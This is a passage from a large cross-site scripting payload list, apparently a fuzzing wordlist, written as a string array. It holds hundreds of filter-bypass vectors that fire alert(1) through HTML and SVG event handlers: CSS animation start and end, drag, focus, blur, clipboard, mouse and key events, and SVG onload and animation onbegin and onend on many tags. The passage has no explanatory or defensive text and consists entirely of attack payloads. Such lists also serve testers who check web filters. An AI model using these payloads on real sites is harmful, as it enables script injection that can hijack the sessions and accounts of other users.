x{}</style><nav style="animation-name:x" onanimationend="alert(1)"></nav>' +xss,'<style>@keyframes x{}</style><nav style="animation-name:x" onanimationstart="alert(1)"></nav>' +xss,'<style>@keyframes x{}</style><nextid style="animation-name:x" onanimationend="alert(1)"></nextid>' +xss,'<style>@keyframes x{}</style><nextid style="animation-name:x" onanimationstart="alert(1)"></nextid>' +xss,'<style>@keyframes x{}</style><nobr style="animation-name:x" onanimationend="alert(1)"></nobr>' +xss,'<style>@keyframes x{}</style><nobr style="animation-name:x" onanimationstart="alert(1)"></nobr>' +xss,'<style>@keyframes x{}</style><noembed style="animation-name:x" onanimationend="alert(1)"></noembed>' +xss,'<style>@keyframes x{}</style><noembed style="animation-name:x" onanimationstart="alert(1)"></noembed>' +xss,'<style>@keyframes x{}</style><noframes style="animation-name:x" onanimationend="alert(1)"></noframes>' +xss,'<style>@keyframes x{}</style><noframes style="animation-name:x" onanimationstart="alert(1)"></noframes>' +xss,'<style>@keyframes x{}</style><noscript style="animation-name:x" onanimationend="alert(1)"></noscript>' +xss,'<style>@keyframes x{}</style><noscript style="animation-name:x" onanimationstart="alert(1)"></noscript>' +xss,'<style>@keyframes x{}</style><object style="animation-name:x" onanimationend="alert(1)"></object>' +xss,'<style>@keyframes x{}</style><object style="animation-name:x" onanimationstart="alert(1)"></object>' +xss,'<style>@keyframes x{}</style><ol style="animation-name:x" onanimationend="alert(1)"></ol>' +xss,'<style>@keyframes x{}</style><ol style="animation-name:x" onanimationstart="alert(1)"></ol>' +xss,'<style>@keyframes x{}</style><optgroup style="animation-name:x" onanimationend="alert(1)"></optgroup>' +xss,'<style>@keyframes x{}</style><optgroup style="animation-name:x" onanimationstart="alert(1)"></optgroup>' +xss,'<style>@keyframes x{}</style><option style="animation-name:x" onanimationend="alert(1)"></option>' +xss,'<style>@keyframes x{}</style><option style="animation-name:x" onanimationstart="alert(1)"></option>' +xss,'<style>@keyframes x{}</style><output style="animation-name:x" onanimationend="alert(1)"></output>' +xss,'<style>@keyframes x{}</style><output style="animation-name:x" onanimationstart="alert(1)"></output>' +xss,'<style>@keyframes x{}</style><p style="animation-name:x" onanimationend="alert(1)"></p>' +xss,'<style>@keyframes x{}</style><p style="animation-name:x" onanimationstart="alert(1)"></p>' +xss,'<style>@keyframes x{}</style><param style="animation-name:x" onanimationend="alert(1)"></param>' +xss,'<style>@keyframes x{}</style><param style="animation-name:x" onanimationstart="alert(1)"></param>' +xss,'<style>@keyframes x{}</style><picture style="animation-name:x" onanimationend="alert(1)"></picture>' +xss,'<style>@keyframes x{}</style><picture style="animation-name:x" onanimationstart="alert(1)"></picture>' +xss,'<style>@keyframes x{}</style><plaintext style="animation-name:x" onanimationend="alert(1)"></plaintext>' +xss,'<style>@keyframes x{}</style><plaintext style="animation-name:x" onanimationstart="alert(1)"></plaintext>' +xss,'<style>@keyframes x{}</style><pre style="animation-name:x" onanimationend="alert(1)"></pre>' +xss,'<style>@keyframes x{}</style><pre style="animation-name:x" onanimationstart="alert(1)"></pre>' +xss,'<style>@keyframes x{}</style><progress style="animation-name:x" onanimationend="alert(1)"></progress>' +xss,'<style>@keyframes x{}</style><progress style="animation-name:x" onanimationstart="alert(1)"></progress>' +xss,'<style>@keyframes x{}</style><q style="animation-name:x" onanimationend="alert(1)"></q>' +xss,'<style>@keyframes x{}</style><q style="animation-name:x" onanimationstart="alert(1)"></q>' +xss,'<style>@keyframes x{}</style><rb style="animation-name:x" onanimationend="alert(1)"></rb>' +xss,'<style>@keyframes x{}</style><rb style="animation-name:x" onanimationstart="alert(1)"></rb>' +xss,'<style>@keyframes x{}</style><rp style="animation-name:x" onanimationend="alert(1)"></rp>' +xss,'<style>@keyframes x{}</style><rp style="animation-name:x" onanimationstart="alert(1)"></rp>' +xss,'<style>@keyframes x{}</style><rt style="animation-name:x" onanimationend="alert(1)"></rt>' +xss,'<style>@keyframes x{}</style><rt style="animation-name:x" onanimationstart="alert(1)"></rt>' +xss,'<style>@keyframes x{}</style><rtc style="animation-name:x" onanimationend="alert(1)"></rtc>' +xss,'<style>@keyframes x{}</style><rtc style="animation-name:x" onanimationstart="alert(1)"></rtc>' +xss,'<style>@keyframes x{}</style><ruby style="animation-name:x" onanimationend="alert(1)"></ruby>' +xss,'<style>@keyframes x{}</style><ruby style="animation-name:x" onanimationstart="alert(1)"></ruby>' +xss,'<style>@keyframes x{}</style><s style="animation-name:x" onanimationend="alert(1)"></s>' +xss,'<style>@keyframes x{}</style><s style="animation-name:x" onanimationstart="alert(1)"></s>' +xss,'<style>@keyframes x{}</style><samp style="animation-name:x" onanimationend="alert(1)"></samp>' +xss,'<style>@keyframes x{}</style><samp style="animation-name:x" onanimationstart="alert(1)"></samp>' +xss,'<style>@keyframes x{}</style><script style="animation-name:x" onanimationend="alert(1)"></script>' +xss,'<style>@keyframes x{}</style><script style="animation-name:x" onanimationstart="alert(1)"></script>' +xss,'<style>@keyframes x{}</style><section style="animation-name:x" onanimationend="alert(1)"></section>' +xss,'<style>@keyframes x{}</style><section style="animation-name:x" onanimationstart="alert(1)"></section>' +xss,'<style>@keyframes x{}</style><select style="animation-name:x" onanimationend="alert(1)"></select>' +xss,'<style>@keyframes x{}</style><select style="animation-name:x" onanimationstart="alert(1)"></select>' +xss,'<style>@keyframes x{}</style><shadow style="animation-name:x" onanimationend="alert(1)"></shadow>' +xss,'<style>@keyframes x{}</style><shadow style="animation-name:x" onanimationstart="alert(1)"></shadow>' +xss,'<style>@keyframes x{}</style><slot style="animation-name:x" onanimationend="alert(1)"></slot>' +xss,'<style>@keyframes x{}</style><slot style="animation-name:x" onanimationstart="alert(1)"></slot>' +xss,'<style>@keyframes x{}</style><small style="animation-name:x" onanimationend="alert(1)"></small>' +xss,'<style>@keyframes x{}</style><small style="animation-name:x" onanimationstart="alert(1)"></small>' +xss,'<style>@keyframes x{}</style><source style="animation-name:x" onanimationend="alert(1)"></source>' +xss,'<style>@keyframes x{}</style><source style="animation-name:x" onanimationstart="alert(1)"></source>' +xss,'<style>@keyframes x{}</style><spacer style="animation-name:x" onanimationend="alert(1)"></spacer>' +xss,'<style>@keyframes x{}</style><spacer style="animation-name:x" onanimationstart="alert(1)"></spacer>' +xss,'<style>@keyframes x{}</style><span style="animation-name:x" onanimationend="alert(1)"></span>' +xss,'<style>@keyframes x{}</style><span style="animation-name:x" onanimationstart="alert(1)"></span>' +xss,'<style>@keyframes x{}</style><strike style="animation-name:x" onanimationend="alert(1)"></strike>' +xss,'<style>@keyframes x{}</style><strike style="animation-name:x" onanimationstart="alert(1)"></strike>' +xss,'<style>@keyframes x{}</style><strong style="animation-name:x" onanimationend="alert(1)"></strong>' +xss,'<style>@keyframes x{}</style><strong style="animation-name:x" onanimationstart="alert(1)"></strong>' +xss,'<style>@keyframes x{}</style><style style="animation-name:x" onanimationend="alert(1)"></style>' +xss,'<style>@keyframes x{}</style><style style="animation-name:x" onanimationstart="alert(1)"></style>' +xss,'<style>@keyframes x{}</style><sub style="animation-name:x" onanimationend="alert(1)"></sub>' +xss,'<style>@keyframes x{}</style><sub style="animation-name:x" onanimationstart="alert(1)"></sub>' +xss,'<style>@keyframes x{}</style><summary style="animation-name:x" onanimationend="alert(1)"></summary>' +xss,'<style>@keyframes x{}</style><summary style="animation-name:x" onanimationstart="alert(1)"></summary>' +xss,'<style>@keyframes x{}</style><sup style="animation-name:x" onanimationend="alert(1)"></sup>' +xss,'<style>@keyframes x{}</style><sup style="animation-name:x" onanimationstart="alert(1)"></sup>' +xss,'<style>@keyframes x{}</style><svg style="animation-name:x" onanimationend="alert(1)"></svg>' +xss,'<style>@keyframes x{}</style><svg style="animation-name:x" onanimationstart="alert(1)"></svg>' +xss,'<style>@keyframes x{}</style><table style="animation-name:x" onanimationend="alert(1)"></table>' +xss,'<style>@keyframes x{}</style><table style="animation-name:x" onanimationstart="alert(1)"></table>' +xss,'<style>@keyframes x{}</style><tbody style="animation-name:x" onanimationend="alert(1)"></tbody>' +xss,'<style>@keyframes x{}</style><tbody style="animation-name:x" onanimationstart="alert(1)"></tbody>' +xss,'<style>@keyframes x{}</style><td style="animation-name:x" onanimationend="alert(1)"></td>' +xss,'<style>@keyframes x{}</style><td style="animation-name:x" onanimationstart="alert(1)"></td>' +xss,'<style>@keyframes x{}</style><template style="animation-name:x" onanimationend="alert(1)"></template>' +xss,'<style>@keyframes x{}</style><template style="animation-name:x" onanimationstart="alert(1)"></template>' +xss,'<style>@keyframes x{}</style><textarea style="animation-name:x" onanimationend="alert(1)"></textarea>' +xss,'<style>@keyframes x{}</style><textarea style="animation-name:x" onanimationstart="alert(1)"></textarea>' +xss,'<style>@keyframes x{}</style><tfoot style="animation-name:x" onanimationend="alert(1)"></tfoot>' +xss,'<style>@keyframes x{}</style><tfoot style="animation-name:x" onanimationstart="alert(1)"></tfoot>' +xss,'<style>@keyframes x{}</style><th style="animation-name:x" onanimationend="alert(1)"></th>' +xss,'<style>@keyframes x{}</style><th style="animation-name:x" onanimationstart="alert(1)"></th>' +xss,'<style>@keyframes x{}</style><thead style="animation-name:x" onanimationend="alert(1)"></thead>' +xss,'<style>@keyframes x{}</style><thead style="animation-name:x" onanimationstart="alert(1)"></thead>' +xss,'<style>@keyframes x{}</style><time style="animation-name:x" onanimationend="alert(1)"></time>' +xss,'<style>@keyframes x{}</style><time style="animation-name:x" onanimationstart="alert(1)"></time>' +xss,'<style>@keyframes x{}</style><title style="animation-name:x" onanimationend="alert(1)"></title>' +xss,'<style>@keyframes x{}</style><title style="animation-name:x" onanimationstart="alert(1)"></title>' +xss,'<style>@keyframes x{}</style><tr style="animation-name:x" onanimationend="alert(1)"></tr>' +xss,'<style>@keyframes x{}</style><tr style="animation-name:x" onanimationstart="alert(1)"></tr>' +xss,'<style>@keyframes x{}</style><track style="animation-name:x" onanimationend="alert(1)"></track>' +xss,'<style>@keyframes x{}</style><track style="animation-name:x" onanimationstart="alert(1)"></track>' +xss,'<style>@keyframes x{}</style><tt style="animation-name:x" onanimationend="alert(1)"></tt>' +xss,'<style>@keyframes x{}</style><tt style="animation-name:x" onanimationstart="alert(1)"></tt>' +xss,'<style>@keyframes x{}</style><u style="animation-name:x" onanimationend="alert(1)"></u>' +xss,'<style>@keyframes x{}</style><u style="animation-name:x" onanimationstart="alert(1)"></u>' +xss,'<style>@keyframes x{}</style><ul style="animation-name:x" onanimationend="alert(1)"></ul>' +xss,'<style>@keyframes x{}</style><ul style="animation-name:x" onanimationstart="alert(1)"></ul>' +xss,'<style>@keyframes x{}</style><var style="animation-name:x" onanimationend="alert(1)"></var>' +xss,'<style>@keyframes x{}</style><var style="animation-name:x" onanimationstart="alert(1)"></var>' +xss,'<style>@keyframes x{}</style><video style="animation-name:x" onanimationend="alert(1)"></video>' +xss,'<style>@keyframes x{}</style><video style="animation-name:x" onanimationstart="alert(1)"></video>' +xss,'<style>@keyframes x{}</style><wbr style="animation-name:x" onanimationend="alert(1)"></wbr>' +xss,'<style>@keyframes x{}</style><wbr style="animation-name:x" onanimationstart="alert(1)"></wbr>' +xss,'<style>@keyframes x{}</style><xmp style="animation-name:x" onanimationend="alert(1)"></xmp>' +xss,'<style>@keyframes x{}</style><xmp style="animation-name:x" onanimationstart="alert(1)"></xmp>' +xss,'<style>@keyframes x{}</style><xss style="animation-name:x" onanimationend="alert(1)"></xss>' +xss,'<style>@keyframes x{}</style><xss style="animation-name:x" onanimationstart="alert(1)"></xss>' +xss,'<sub draggable="true" ondrag="alert(1)">test</sub>' +xss,'<sub draggable="true" ondragend="alert(1)">test</sub>' +xss,'<sub draggable="true" ondragenter="alert(1)">test</sub>' +xss,'<sub draggable="true" ondragleave="alert(1)">test</sub>' +xss,'<sub draggable="true" ondragstart="alert(1)">test</sub>' +xss,'<sub id=x tabindex=1 onactivate=alert(1)></sub>' +xss,'<sub id=x tabindex=1 onbeforeactivate=alert(1)></sub>' +xss,'<sub id=x tabindex=1 onbeforedeactivate=alert(1)></sub><input autofocus>' +xss,'<sub id=x tabindex=1 ondeactivate=alert(1)></sub><input id=y autofocus>' +xss,'<sub id=x tabindex=1 onfocus=alert(1)></sub>' +xss,'<sub id=x tabindex=1 onfocusin=alert(1)></sub>' +xss,'<sub onbeforecopy="alert(1)" contenteditable>test</sub>' +xss,'<sub onbeforecut="alert(1)" contenteditable>test</sub>' +xss,'<sub onbeforepaste="alert(1)" contenteditable>test</sub>' +xss,'<sub onblur=alert(1) tabindex=1 id=x></sub><input autofocus>' +xss,'<sub onclick="alert(1)">test</sub>' +xss,'<sub oncontextmenu="alert(1)">test</sub>' +xss,'<sub oncopy="alert(1)" contenteditable>test</sub>' +xss,'<sub oncut="alert(1)" contenteditable>test</sub>' +xss,'<sub ondblclick="alert(1)">test</sub>' +xss,'<sub onfocusout=alert(1) tabindex=1 id=x></sub><input autofocus>' +xss,'<sub onkeydown="alert(1)" contenteditable>test</sub>' +xss,'<sub onkeypress="alert(1)" contenteditable>test</sub>' +xss,'<sub onkeyup="alert(1)" contenteditable>test</sub>' +xss,'<sub onmousedown="alert(1)">test</sub>' +xss,'<sub onmouseenter="alert(1)">test</sub>' +xss,'<sub onmouseleave="alert(1)">test</sub>' +xss,'<sub onmousemove="alert(1)">test</sub>' +xss,'<sub onmouseout="alert(1)">test</sub>' +xss,'<sub onmouseover="alert(1)">test</sub>' +xss,'<sub onmouseup="alert(1)">test</sub>' +xss,'<sub onpaste="alert(1)" contenteditable>test</sub>' +xss,'<summary draggable="true" ondrag="alert(1)">test</summary>' +xss,'<summary draggable="true" ondragend="alert(1)">test</summary>' +xss,'<summary draggable="true" ondragenter="alert(1)">test</summary>' +xss,'<summary draggable="true" ondragleave="alert(1)">test</summary>' +xss,'<summary draggable="true" ondragstart="alert(1)">test</summary>' +xss,'<summary id=x tabindex=1 onactivate=alert(1)></summary>' +xss,'<summary id=x tabindex=1 onbeforeactivate=alert(1)></summary>' +xss,'<summary id=x tabindex=1 onbeforedeactivate=alert(1)></summary><input autofocus>' +xss,'<summary id=x tabindex=1 ondeactivate=alert(1)></summary><input id=y autofocus>' +xss,'<summary id=x tabindex=1 onfocus=alert(1)></summary>' +xss,'<summary id=x tabindex=1 onfocusin=alert(1)></summary>' +xss,'<summary onbeforecopy="alert(1)" contenteditable>test</summary>' +xss,'<summary onbeforecut="alert(1)" contenteditable>test</summary>' +xss,'<summary onbeforepaste="alert(1)" contenteditable>test</summary>' +xss,'<summary onblur=alert(1) tabindex=1 id=x></summary><input autofocus>' +xss,'<summary onclick="alert(1)">test</summary>' +xss,'<summary oncontextmenu="alert(1)">test</summary>' +xss,'<summary oncopy="alert(1)" contenteditable>test</summary>' +xss,'<summary oncut="alert(1)" contenteditable>test</summary>' +xss,'<summary ondblclick="alert(1)">test</summary>' +xss,'<summary onfocusout=alert(1) tabindex=1 id=x></summary><input autofocus>' +xss,'<summary onkeydown="alert(1)" contenteditable>test</summary>' +xss,'<summary onkeypress="alert(1)" contenteditable>test</summary>' +xss,'<summary onkeyup="alert(1)" contenteditable>test</summary>' +xss,'<summary onmousedown="alert(1)">test</summary>' +xss,'<summary onmouseenter="alert(1)">test</summary>' +xss,'<summary onmouseleave="alert(1)">test</summary>' +xss,'<summary onmousemove="alert(1)">test</summary>' +xss,'<summary onmouseout="alert(1)">test</summary>' +xss,'<summary onmouseover="alert(1)">test</summary>' +xss,'<summary onmouseup="alert(1)">test</summary>' +xss,'<summary onpaste="alert(1)" contenteditable>test</summary>' +xss,'<sup draggable="true" ondrag="alert(1)">test</sup>' +xss,'<sup draggable="true" ondragend="alert(1)">test</sup>' +xss,'<sup draggable="true" ondragenter="alert(1)">test</sup>' +xss,'<sup draggable="true" ondragleave="alert(1)">test</sup>' +xss,'<sup draggable="true" ondragstart="alert(1)">test</sup>' +xss,'<sup id=x tabindex=1 onactivate=alert(1)></sup>' +xss,'<sup id=x tabindex=1 onbeforeactivate=alert(1)></sup>' +xss,'<sup id=x tabindex=1 onbeforedeactivate=alert(1)></sup><input autofocus>' +xss,'<sup id=x tabindex=1 ondeactivate=alert(1)></sup><input id=y autofocus>' +xss,'<sup id=x tabindex=1 onfocus=alert(1)></sup>' +xss,'<sup id=x tabindex=1 onfocusin=alert(1)></sup>' +xss,'<sup onbeforecopy="alert(1)" contenteditable>test</sup>' +xss,'<sup onbeforecut="alert(1)" contenteditable>test</sup>' +xss,'<sup onbeforepaste="alert(1)" contenteditable>test</sup>' +xss,'<sup onblur=alert(1) tabindex=1 id=x></sup><input autofocus>' +xss,'<sup onclick="alert(1)">test</sup>' +xss,'<sup oncontextmenu="alert(1)">test</sup>' +xss,'<sup oncopy="alert(1)" contenteditable>test</sup>' +xss,'<sup oncut="alert(1)" contenteditable>test</sup>' +xss,'<sup ondblclick="alert(1)">test</sup>' +xss,'<sup onfocusout=alert(1) tabindex=1 id=x></sup><input autofocus>' +xss,'<sup onkeydown="alert(1)" contenteditable>test</sup>' +xss,'<sup onkeypress="alert(1)" contenteditable>test</sup>' +xss,'<sup onkeyup="alert(1)" contenteditable>test</sup>' +xss,'<sup onmousedown="alert(1)">test</sup>' +xss,'<sup onmouseenter="alert(1)">test</sup>' +xss,'<sup onmouseleave="alert(1)">test</sup>' +xss,'<sup onmousemove="alert(1)">test</sup>' +xss,'<sup onmouseout="alert(1)">test</sup>' +xss,'<sup onmouseover="alert(1)">test</sup>' +xss,'<sup onmouseup="alert(1)">test</sup>' +xss,'<sup onpaste="alert(1)" contenteditable>test</sup>' +xss,'<svg draggable="true" ondrag="alert(1)">test</svg>' +xss,'<svg draggable="true" ondragend="alert(1)">test</svg>' +xss,'<svg draggable="true" ondragenter="alert(1)">test</svg>' +xss,'<svg draggable="true" ondragleave="alert(1)">test</svg>' +xss,'<svg draggable="true" ondragstart="alert(1)">test</svg>' +xss,'<svg id=x onfocus=alert(1)>' +xss,'<svg id=x onfocusin=alert(1)>' +xss,'<svg id=x tabindex=1 onactivate=alert(1)></svg>' +xss,'<svg id=x tabindex=1 onbeforeactivate=alert(1)></svg>' +xss,'<svg id=x tabindex=1 onbeforedeactivate=alert(1)></svg><input autofocus>' +xss,'<svg id=x tabindex=1 ondeactivate=alert(1)></svg><input id=y autofocus>' +xss,'<svg onbeforecopy="alert(1)" contenteditable>test</svg>' +xss,'<svg onbeforecut="alert(1)" contenteditable>test</svg>' +xss,'<svg onbeforepaste="alert(1)" contenteditable>test</svg>' +xss,'<svg onblur=alert(1) tabindex=1 id=x></svg><input autofocus>' +xss,'<svg onclick="alert(1)">test</svg>' +xss,'<svg oncontextmenu="alert(1)">test</svg>' +xss,'<svg oncopy="alert(1)" contenteditable>test</svg>' +xss,'<svg oncut="alert(1)" contenteditable>test</svg>' +xss,'<svg ondblclick="alert(1)">test</svg>' +xss,'<svg onfocusout=alert(1) tabindex=1 id=x></svg><input autofocus>' +xss,'<svg onkeydown="alert(1)" contenteditable>test</svg>' +xss,'<svg onkeypress="alert(1)" contenteditable>test</svg>' +xss,'<svg onkeyup="alert(1)" contenteditable>test</svg>' +xss,'<svg onload=alert(1)>' +xss,'<svg onmousedown="alert(1)">test</svg>' +xss,'<svg onmouseenter="alert(1)">test</svg>' +xss,'<svg onmouseleave="alert(1)">test</svg>' +xss,'<svg onmousemove="alert(1)">test</svg>' +xss,'<svg onmouseout="alert(1)">test</svg>' +xss,'<svg onmouseover="alert(1)">test</svg>' +xss,'<svg onmouseup="alert(1)">test</svg>' +xss,'<svg onpaste="alert(1)" contenteditable>test</svg>' +xss,'<svg onunload=window.open('javascript:alert(1)')>' +xss,'<svg><a onload=alert(1)></a>' +xss,'<svg><abbr onload=alert(1)></abbr>' +xss,'<svg><acronym onload=alert(1)></acronym>' +xss,'<svg><address onload=alert(1)></address>' +xss,'<svg><animate onbegin=alert(1) attributeName=x dur=1s>' +xss,'<svg><animate onend=alert(1) attributeName=x dur=1s>' +xss,'<svg><animate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2 />' +xss,'<svg><animatetransform onbegin=alert(1) attributeName=transform>' +xss,'<svg><animatetransform onend=alert(1) attributeName=transform dur=1s>' +xss,'<svg><animatetransform onrepeat=alert(1) attributeName=transform repeatCount=2 dur=1s>' +xss,'<svg><applet onload=alert(1)></applet>' +xss,'<svg><area onload=alert(1)></area>' +xss,'<svg><article onload=alert(1)></article>' +xss,'<svg><aside onload=alert(1)></aside>' +xss,'<svg><audio onload=alert(1)></audio>' +xss,'<svg><b onload=alert(1)></b>' +xss,'<svg><base onload=alert(1)></base>' +xss,'<svg><basefont onload=alert(1)></basefont>' +xss,'<svg><bdi onload=alert(1)></bdi>' +xss,'<svg><bdo onload=alert(1)></bdo>' +xss,'<svg><bgsound onload=alert(1)></bgsound>' +xss,'<svg><big onload=alert(1)></big>' +xss,'<svg><blink onload=alert(1)></blink>' +xss,'<svg><blockquote onload=alert(1)></blockquote>' +xss,'<svg><br onload=alert(1)></br>' +xss,'<svg><button onload=alert(1)></button>' +xss,'<svg><canvas onload=alert(1)></canvas>' +xss,'<svg><caption onload=alert(1)></caption>' +xss,'<svg><center onload=alert(1)></center>' +xss,'<svg><cite onload=alert(1)></cite>' +xss,'<svg><code onload=alert(1)></code>' +xss,'<svg><col onload=alert(1)></col>' +xss,'<svg><colgroup onload=alert(1)></colgroup>' +xss,'<svg><command onload=alert(1)></command>' +xss,'<svg><content onload=alert(1)></content>' +xss,'<svg><data onload=alert(1)></data>' +xss,'<svg><datalist onload=alert(1)></datalist>' +xss,'<svg><dd onload=alert(1)></dd>' +xss,'<svg><del onload=alert(1)></del>' +xss,'<svg><details onload=alert(1)></details>' +xss,'<svg><dfn onload=alert(1)></dfn>' +xss,'<svg><dialog onload=alert(1)></dialog>' +xss,'<svg><dir onload=alert(1)></dir>' +xss,'<svg><discard onbegin=alert(1)>' +xss,'<svg><div onload=alert(1)></div>' +xss,'<svg><dl onload=alert(1)></dl>' +xss,'<svg><dt onload=alert(1)></dt>' +xss,'<svg><element onload=alert(1)></element>' +xss,'<svg><em onload=alert(1)></em>' +xss,'<svg><fieldset onload=alert(1)></fieldset>' +xss,'<svg><figcaption onload=alert(1)></figcaption>' +xss,'<svg><figure onload=alert(1)></figure>' +xss,'<svg><font onload=alert(1)></font>' +xss,'<svg><footer onload=alert(1)></footer>' +xss,'<svg><form onload=alert(1)></form>' +xss,'<svg><frameset onload=alert(1)></frameset>' +xss,'<svg><h1 onload=alert(1)></h1>' +xss,'<svg><head onload=alert(1)></head>' +xss,'<svg><header onload=alert(1)></header>' +xss,'<svg><hgroup onload=alert(1)></hgroup>' +xss,'<svg><hr onload=alert(1)></hr>' +xss,'<svg><html onload=alert(1)></html>' +xss,'<svg><i onload=alert(1)></i>' +xss,'<svg><image href=1 onerror=alert(1)>' +xss,'<svg><image href=validimage.png onload=alert(1)>' +xss,'<svg><ins onload=alert(1)></ins>' +xss,'<svg><kbd onload=alert(1)></kbd>' +xss,'<svg><keygen onload=alert(1)></keygen>' +xss,'<svg><label onload=alert(1)></label>' +xss,'<svg><legend onload=alert(1)></legend>' +xss,'<svg><li onload=alert(1)></li>' +xss,'<svg><listing onload=alert(1)></listing>' +xss,'<svg><main onload=alert(1)></main>' +xss,'<svg><map onload=alert(1)></map>' +xss,'<svg><mark onload=alert(1)></mark>' +xss,'<svg><marquee onload=alert(1)></marquee>' +xss,'<svg><menu onload=alert(1)></menu>' +xss,'<svg><menuitem onload=alert(1)></menuitem>' +xss,'<svg><meta onload=alert(1)></meta>' +xss,'<svg><meter onload=alert(1)></meter>' +xss,'<svg><multicol onload=alert(1)></multicol>' +xss,'<svg><nav onload=alert(1)></nav>' +xss,'<svg><nextid onload=alert(1)></nextid>' +xss,'<svg><nobr onload=alert(1)></nobr>' +xss,'<svg><noembed onload=alert(1)></noembed>' +xss,'<svg><noframes onload=alert(1)></noframes>' +xss,'<svg><noscript onload=alert(1)></noscript>' +xss,'<svg><ol onload=alert(1)></ol>' +xss,'<svg><optgroup onload=alert(1)></optgroup>' +xss,'<svg><option onload=alert(1)></option>' +xss,'<svg><output onload=alert(1)></output>' +xss,'<svg><p onload=alert(1)></p>' +xss,'<svg><param onload=alert(1)></param>' +xss,'<svg><path><animateMotion onbegin=alert(1) dur="1s" repeatCount="1">' +xss,'<svg><path><animateMotion onend=alert(1) dur=1s repeatCount=1>' +xss,'<svg><path><animateMotion onrepeat=alert(1) dur="1s" repeatCount="2">' +xss,'<svg><picture onload=alert(1)></picture>' +xss,'<svg><plaintext onload=alert(1)></plaintext>' +xss,'<svg><pre onload=alert(1)></pre>' +xss,'<svg><progress onload=alert(1)></progress>' +xss,'<svg><q onload=alert(1)></q>' +xss,'<svg><rb onload=alert(1)></rb>' +xss,'<svg><rp onload=alert(1)></rp>' +xss,'<svg><rt onload=alert(1)></rt>' +xss,'<svg><rtc onload=alert(1)></rtc>' +xss,'<svg><ruby onload=alert(1)></ruby>' +xss,'<svg><s onload=alert(1)></s>' +xss,'<svg><samp onload=alert(1)></samp>' +xss,'<svg><section onload=alert(1)></section>' +xss,'<svg><select onload=alert(1)></select>' +xss,'<svg><set onbegin=alert(1) attributename=x dur=1s>' +xss,'<svg><set onend=alert(1) attributename=x dur=1s>' +xss,'<svg><set onrepeat=alert(1) attributename=x dur=1s repeatcount=2>' +xss,'<svg><shadow onload=alert(1)></shadow>' +xss,'<svg><slot onload=alert(1)></slot>' +xss,'<svg><small onload=alert(1)></small>' +xss,'<svg><source onload=alert(1)></source>' +xss,'<svg><spacer onload=alert(1)></spacer>' +xss,'<svg><span onload=alert(1)></span>' +xss,'<svg><strike onload=alert(1)></strike>' +xss,'<svg><strong onload=alert(1)></strong>' +xss,'<svg><sub onload=alert(1)></sub>' +xss,'<svg><summary onload=alert(1)></summary>' +xss,'<svg><sup onload=alert(1)></sup>' +xss,'<svg><table onload=alert(1)></table>' +xss,'<svg><tbody onload=alert(1)></tbody>' +xss,'<svg><td onload=alert(1)></td>' +xss,'<svg><template onload=alert(1)></template>' +xss,'<svg><textarea onload=alert(1)></textarea>' +xss,'<svg><tfoot onload=alert(1)></tfoot>' +xss,'<svg><th onload=alert(1)></th>' +xss,'<svg><thead onload=alert(1)></thead>' +xss,'<svg><time onload=alert(1)></time>' +xss,'<svg><title onload=alert(1)></title>' +xss,'<svg><tr onload=alert(1)></tr>' +xss,'<svg><tt onload=alert(1)></tt>' +xss,'<svg><u onload=alert(1)></u>' +xss,'<svg><ul onload=alert(1)></ul>' +xss,'<svg><var onload=alert(1)></var>' +xss,'<svg><video onload=alert(1)></video>' +xss,'<svg><wbr onload=alert(1)></wbr>' +xss,'<svg><xmp onload=alert(1)></xmp>' +xss,'<svg><xss onload=alert(1)></xss>' +xss,'<table draggable="true" ondrag="alert(1)">test</table>' +xss,'<table draggable="true" ondragend="alert(1)">test</table>' +xss,'<table draggable="true" ondragenter="alert(1)">test</table>' +xss,'<table draggable="true" ondragleave="alert(1)">test</table>' +xss,'<table draggable="true" ondragstart="alert(1)">test</table>' +xss,'<table id=x tabindex=1 onactivate=alert(1)></table>' +xss,'<table id=x tabindex=1 onbeforeactivate=alert(1)></table>' +xss,'<table id=x tabindex=1 onbeforedeactivate=alert(1)></table><input autofocus>' +xss,'<table id=x tabindex=1 ondeactivate=alert(1)></table><input id=y autofocus>' +xss,'<table id=x tabindex=1 onfocus=alert(1)></table>' +xss,'<table id=x tabindex=1 onfocusin=alert(1)></table>' +xss,'<table onbeforecopy="alert(1)" contenteditable>test</table>' +xss,'<table onbeforecut="alert(1)" contenteditable>test</table>' +xss,'<table onbeforepaste="alert(1)" contenteditable>test</table>' +xss,'<table onblur=alert(1) tabindex=1 id=x></table><input autofocus>' +xss,'<table onclick="alert(1)">test</table>' +xss,'<table oncontextmenu="alert(1)">test</table>' +xss,'<table oncopy="alert(1)" contenteditable>test</table>' +xss,'<table oncut="alert(1)" contenteditable>test</table>' +xss,'<table ondblclick="alert(1)">test</table>' +xss,'<table onfocusout=alert(1) tabindex=1 id=x></table><input autofocus>' +xss,'<table onkeydown="alert(1)" contenteditable>test</table>' +xss,'<table onkeypress="alert(1)" contenteditable>test</table>' +xss,'<table onkeyup="alert(1)" contenteditable>test</table>' +xss,'<table onmousedown="alert(1)">test</table>' +xss,'<table onmouseenter="alert(1)">test</table>' +xss,'<table onmouseleave="alert(1)">test</table>' +xss,'<table onmousemove="alert(1)">test</table>' +xss,'<table onmouseout="alert(1)">test</table>' +xss,'<table onmouseover="alert(1)">test</table>' +xss,'<table onmouseup="alert(1)">test</table>' +xss,'<table onpaste="alert(1)" contenteditable>test</table>' +xss,'<tbody draggable="true" ondrag="alert(1)">test</tbody>' +xss,'<tbody draggable="true" ondragend="alert(1)">test</tbody>' +xss,'<tbody draggable="true" ondragenter="alert(1)">test</tbody>' +xss,'<tbody draggable="true" ondragleave="alert(1)">test</tbody>' +xss,'<tbody draggable="true" ondragstart="alert(1)">test</tbody>' +xss,'<tbody id=x tabindex=1 onactivate=alert(1)></tbody>' +xss,'<tbody id=x tabindex=1 onbeforeactivate=alert(1)></tbody>' +xss,'<tbody id=x tabindex=1 onbeforedeactivate=alert(1)></tbody><input autofocus>' +xss,'<tbody id=x tabindex=1 ondeactivate=alert(1)></tbody><input id=y autofocus>' +xss,'<tbody id=x tabindex=1 onfocus=alert(1)></tbody>' +xss,'<tbody id=x tabindex=1 onfocusin=alert(1)></tbody>' +xss,'<tbody onbeforecopy="alert(1)" contenteditable>test</tbody>' +xss,'<tbody onbeforecut="alert(1)" contenteditable>test</tbody>' +xss,'<tbody onbeforepaste="alert(1)" contenteditable>test</tbody>' +xss,'<tbody onblur=alert(1) tabindex=1 id=x></tbody><input autofocus>' +xss,'<tbody onclick="alert(1)">test</tbody>' +xss,'<tbody oncontextmenu="alert(1)">test</tbody>' +xss,'<tbody 